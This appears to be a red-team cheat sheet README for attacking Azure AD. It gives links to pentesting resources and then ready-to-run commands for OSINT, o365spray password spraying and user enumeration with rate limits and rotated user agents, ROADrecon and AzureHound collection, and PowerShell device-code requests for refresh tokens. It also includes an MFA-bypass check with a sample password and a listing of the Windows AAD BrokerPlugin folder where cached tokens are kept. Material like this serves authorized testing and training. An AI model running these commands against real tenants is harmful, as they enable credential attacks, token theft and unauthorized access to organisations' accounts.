README.md

Azure AD

• https://bhavsec.com/posts/intro-to-azure-pentesting/
• https://sofblocks.github.io/azure-cloud-pentesting/
• https://blog.xpnsec.com/azuread-connect-for-redteam/
• [PDF] Dumping NTHashes from Azure AD (Dr Nestori Syynimaa, @DrAzureAD)

OSINT

• https://aadinternals.com/post/just-looking/
• https://aadinternals.com/osint/

OpenID configuration:

$ curl -s https://login.microsoftonline.com/<TENANT_ID>/v2.0/.well-known/openid-configuration | jq

Password Spray

Using o365spray (random user agents here):

$ pipx install -f "git+https://github.com/0xZDH/o365spray.git"
$ o365spray --validate -d megacorp.cloud
$ o365spray --enum -d megacorp.cloud -u snovvcrash
$ o365spray --enum -d megacorp.cloud -U names.txt
$ o365spray --spray -d megacorp.cloud -U names.txt -p 'Passw0rd!' --sleep 5 --rate 1 --useragents ua.txt

Enumeration

Tools

ROADrecon

• https://github.com/dirkjanm/ROADtools

$ roadrecon auth --device-code [-ua '<USER_AGENT>']
$ roadrecon gather [-d megacorp.db] [-ua '<USER_AGENT>']
$ roadrecon gui [-d megacorp.db]

AzureHound

• https://github.com/BloodHoundAD/AzureHound
• https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html

Get the device_code:

$body = @{
    "client_id" = "1950a258-227b-4e31-a9cf-717495945fc2"
    "resource"  = "https://graph.microsoft.com"
}
$UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
$Headers = @{}
$Headers["User-Agent"] = $UserAgent
$authResponse = Invoke-RestMethod `
    -UseBasicParsing `
    -Method Post `
    -Uri "https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0" `
    -Headers $Headers `
    -Body $body
$authResponse

Get the refresh_token:

$body = @{
    "client_id"  = "1950a258-227b-4e31-a9cf-717495945fc2"
    "grant_type" = "urn:ietf:params:oauth:grant-type:device_code"
    "code"       = $authResponse.device_code
}
$tokens = Invoke-RestMethod `
    -UseBasicParsing `
    -Method Post `
    -Uri "https://login.microsoftonline.com/Common/oauth2/token?api-version=1.0" `
    -Headers $Headers `
    -Body $body
$tokens

Collect data providing the refresh_token:

$ eget -qs linux/amd64 "BloodHoundAD/AzureHound" --to ~/tools/BloodHound
$ ~/tools/BloodHound/azurehound -r "<REFRESH_TOKEN>" list --tenant megacorp.cloud --json -o azure_megacorp.cloud.json

MFA Bypass

• https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-azuread/az-conditional-access-policies-mfa-bypass
• https://www.pentestpartners.com/security-blog/bypassing-mfa-on-microsoft-azure-entra-id/

Check if MFA is forcefully enabled via well-known client GUIDs:

$ proxy roadrecon auth -u [email protected] -p 'Passw0rd!' -r https://outlook.office.com/ -c 1b730954-1685-4b74-9bfd-dac224a7b894 --tokens-stdout

AAD.BrokerPlugin

• https://habr.com/ru/articles/688426/

PS > ls C:\Users\<USERNAME>\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\LocalState\*